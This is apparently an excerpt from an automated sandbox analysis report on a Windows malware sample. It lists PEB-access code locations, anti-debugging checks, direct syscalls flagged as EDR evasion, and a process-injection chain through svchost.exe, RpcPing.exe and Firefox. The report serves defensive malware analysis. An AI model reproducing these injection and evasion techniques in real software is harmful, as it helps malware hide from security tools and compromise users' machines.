            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]2_2_0346CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]2_2_0346CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]2_2_0346CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DEA60 mov eax, dword ptr fs:[00000030h]2_2_034DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034ACA72 mov eax, dword ptr fs:[00000030h]2_2_034ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034ACA72 mov eax, dword ptr fs:[00000030h]2_2_034ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BCA11 mov eax, dword ptr fs:[00000030h]2_2_034BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA24 mov eax, dword ptr fs:[00000030h]2_2_0346CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345EA2E mov eax, dword ptr fs:[00000030h]2_2_0345EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03454A35 mov eax, dword ptr fs:[00000030h]2_2_03454A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03454A35 mov eax, dword ptr fs:[00000030h]2_2_03454A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA38 mov eax, dword ptr fs:[00000030h]2_2_0346CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]2_2_03486ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]2_2_03486ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]2_2_03486ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430AD0 mov eax, dword ptr fs:[00000030h]2_2_03430AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03464AD0 mov eax, dword ptr fs:[00000030h]2_2_03464AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03464AD0 mov eax, dword ptr fs:[00000030h]2_2_03464AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346AAEE mov eax, dword ptr fs:[00000030h]2_2_0346AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346AAEE mov eax, dword ptr fs:[00000030h]2_2_0346AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504A80 mov eax, dword ptr fs:[00000030h]2_2_03504A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468A90 mov edx, dword ptr fs:[00000030h]2_2_03468A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438AA0 mov eax, dword ptr fs:[00000030h]2_2_03438AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438AA0 mov eax, dword ptr fs:[00000030h]2_2_03438AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03486AA4 mov eax, dword ptr fs:[00000030h]2_2_03486AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0946 mov eax, dword ptr fs:[00000030h]2_2_034B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]2_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]2_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]2_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E mov eax, dword ptr fs:[00000030h]2_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E mov edx, dword ptr fs:[00000030h]2_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E mov eax, dword ptr fs:[00000030h]2_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4978 mov eax, dword ptr fs:[00000030h]2_2_034D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4978 mov eax, dword ptr fs:[00000030h]2_2_034D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BC97C mov eax, dword ptr fs:[00000030h]2_2_034BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE908 mov eax, dword ptr fs:[00000030h]2_2_034AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE908 mov eax, dword ptr fs:[00000030h]2_2_034AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BC912 mov eax, dword ptr fs:[00000030h]2_2_034BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428918 mov eax, dword ptr fs:[00000030h]2_2_03428918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428918 mov eax, dword ptr fs:[00000030h]2_2_03428918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B892A mov eax, dword ptr fs:[00000030h]2_2_034B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C892B mov eax, dword ptr fs:[00000030h]2_2_034C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C69C0 mov eax, dword ptr fs:[00000030h]2_2_034C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034649D0 mov eax, dword ptr fs:[00000030h]2_2_034649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FA9D3 mov eax, dword ptr fs:[00000030h]2_2_034FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE9E0 mov eax, dword ptr fs:[00000030h]2_2_034BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034629F9 mov eax, dword ptr fs:[00000030h]2_2_034629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034629F9 mov eax, dword ptr fs:[00000030h]2_2_034629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034309AD mov eax, dword ptr fs:[00000030h]2_2_034309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034309AD mov eax, dword ptr fs:[00000030h]2_2_034309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B89B3 mov esi, dword ptr fs:[00000030h]2_2_034B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B89B3 mov eax, dword ptr fs:[00000030h]2_2_034B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B89B3 mov eax, dword ptr fs:[00000030h]2_2_034B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03442840 mov ecx, dword ptr fs:[00000030h]2_2_03442840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460854 mov eax, dword ptr fs:[00000030h]2_2_03460854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434859 mov eax, dword ptr fs:[00000030h]2_2_03434859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434859 mov eax, dword ptr fs:[00000030h]2_2_03434859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE872 mov eax, dword ptr fs:[00000030h]2_2_034BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE872 mov eax, dword ptr fs:[00000030h]2_2_034BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6870 mov eax, dword ptr fs:[00000030h]2_2_034C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6870 mov eax, dword ptr fs:[00000030h]2_2_034C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BC810 mov eax, dword ptr fs:[00000030h]2_2_034BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]2_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]2_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]2_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452835 mov ecx, dword ptr fs:[00000030h]2_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]2_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]2_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A830 mov eax, dword ptr fs:[00000030h]2_2_0346A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D483A mov eax, dword ptr fs:[00000030h]2_2_034D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D483A mov eax, dword ptr fs:[00000030h]2_2_034D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E8C0 mov eax, dword ptr fs:[00000030h]2_2_0345E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FA8E4 mov eax, dword ptr fs:[00000030h]2_2_034FA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C8F9 mov eax, dword ptr fs:[00000030h]2_2_0346C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C8F9 mov eax, dword ptr fs:[00000030h]2_2_0346C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430887 mov eax, dword ptr fs:[00000030h]2_2_03430887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BC89D mov eax, dword ptr fs:[00000030h]2_2_034BC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4F40 mov eax, dword ptr fs:[00000030h]2_2_034B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4F40 mov eax, dword ptr fs:[00000030h]2_2_034B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4F40 mov eax, dword ptr fs:[00000030h]2_2_034B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4F40 mov eax, dword ptr fs:[00000030h]2_2_034B4F40
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeNtProtectVirtualMemory: Direct from: 0x77542F9CJump to behavior
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeNtSetInformationProcess: Direct from: 0x77542C5CJump to behavior
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeNtOpenKeyEx: Direct from: 0x77542B9CJump to behavior
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeNtProtectVirtualMemory: Direct from: 0x77537B2EJump to behavior
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeNtCreateFile: Direct from: 0x77542FECJump to behavior
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeNtOpenFile: Direct from: 0x77542DCCJump to behavior
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeNtQueryInformationToken: Direct from: 0x77542CACJump to behavior
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeNtTerminateThread: Direct from: 0x77542FCCJump to behavior
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeNtDeviceIoControlFile: Direct from: 0x77542AECJump to behavior
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeNtAllocateVirtualMemory: Direct from: 0x77542BECJump to behavior
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeNtQueryVolumeInformationFile: Direct from: 0x77542F2CJump to behavior
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeNtOpenSection: Direct from: 0x77542E0CJump to behavior
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeNtAllocateVirtualMemory: Direct from: 0x775448ECJump to behavior
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeNtSetInformationThread: Direct from: 0x775363F9Jump to behavior
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeNtQuerySystemInformation: Direct from: 0x775448CCJump to behavior
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeNtClose: Direct from: 0x77542B6C
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeNtReadVirtualMemory: Direct from: 0x77542E8CJump to behavior
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeNtCreateKey: Direct from: 0x77542C6CJump to behavior
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeNtSetInformationThread: Direct from: 0x77542B4CJump to behavior
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeNtQueryAttributesFile: Direct from: 0x77542E6CJump to behavior
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeNtAllocateVirtualMemory: Direct from: 0x77543C9CJump to behavior
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeNtCreateUserProcess: Direct from: 0x7754371CJump to behavior
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeNtQueryInformationProcess: Direct from: 0x77542C26Jump to behavior
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeNtResumeThread: Direct from: 0x77542FBCJump to behavior
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeNtWriteVirtualMemory: Direct from: 0x7754490CJump to behavior
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeNtDelayExecution: Direct from: 0x77542DDCJump to behavior
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeNtAllocateVirtualMemory: Direct from: 0x77542BFCJump to behavior
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeNtReadFile: Direct from: 0x77542ADCJump to behavior
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeNtQuerySystemInformation: Direct from: 0x77542DFCJump to behavior
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeNtResumeThread: Direct from: 0x775436ACJump to behavior
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeNtNotifyChangeKey: Direct from: 0x77543C2CJump to behavior
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeNtCreateMutant: Direct from: 0x775435CCJump to behavior
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeNtWriteVirtualMemory: Direct from: 0x77542E3CJump to behavior
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeNtMapViewOfSection: Direct from: 0x77542D1CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\RpcPing.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: NULL target: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: NULL target: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\RpcPing.exeThread register set: target process: 6424Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\RpcPing.exeThread APC queued: target process: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 29EA008Jump to behavior
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\N2Qncau2rN.exe"Jump to behavior
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeProcess created: C:\Windows\SysWOW64\RpcPing.exe "C:\Windows\SysWOW64\RpcPing.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
            Source: auuGcaPMTDojV.exe, 00000003.00000000.1802688702.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000003.00000002.4128448538.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000000.1954851803.00000000011C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: N2Qncau2rN.exe, auuGcaPMTDojV.exe, 00000003.00000000.1802688702.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000003.00000002.4128448538.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000000.1954851803.00000000011C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: auuGcaPMTDojV.exe, 00000003.00000000.1802688702.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000003.00000002.4128448538.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000000.1954851803.00000000011C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: auuGcaPMTDojV.exe, 00000003.00000000.1802688702.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000003.00000002.4128448538.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000000.1954851803.00000000011C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: N2Qncau2rN.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
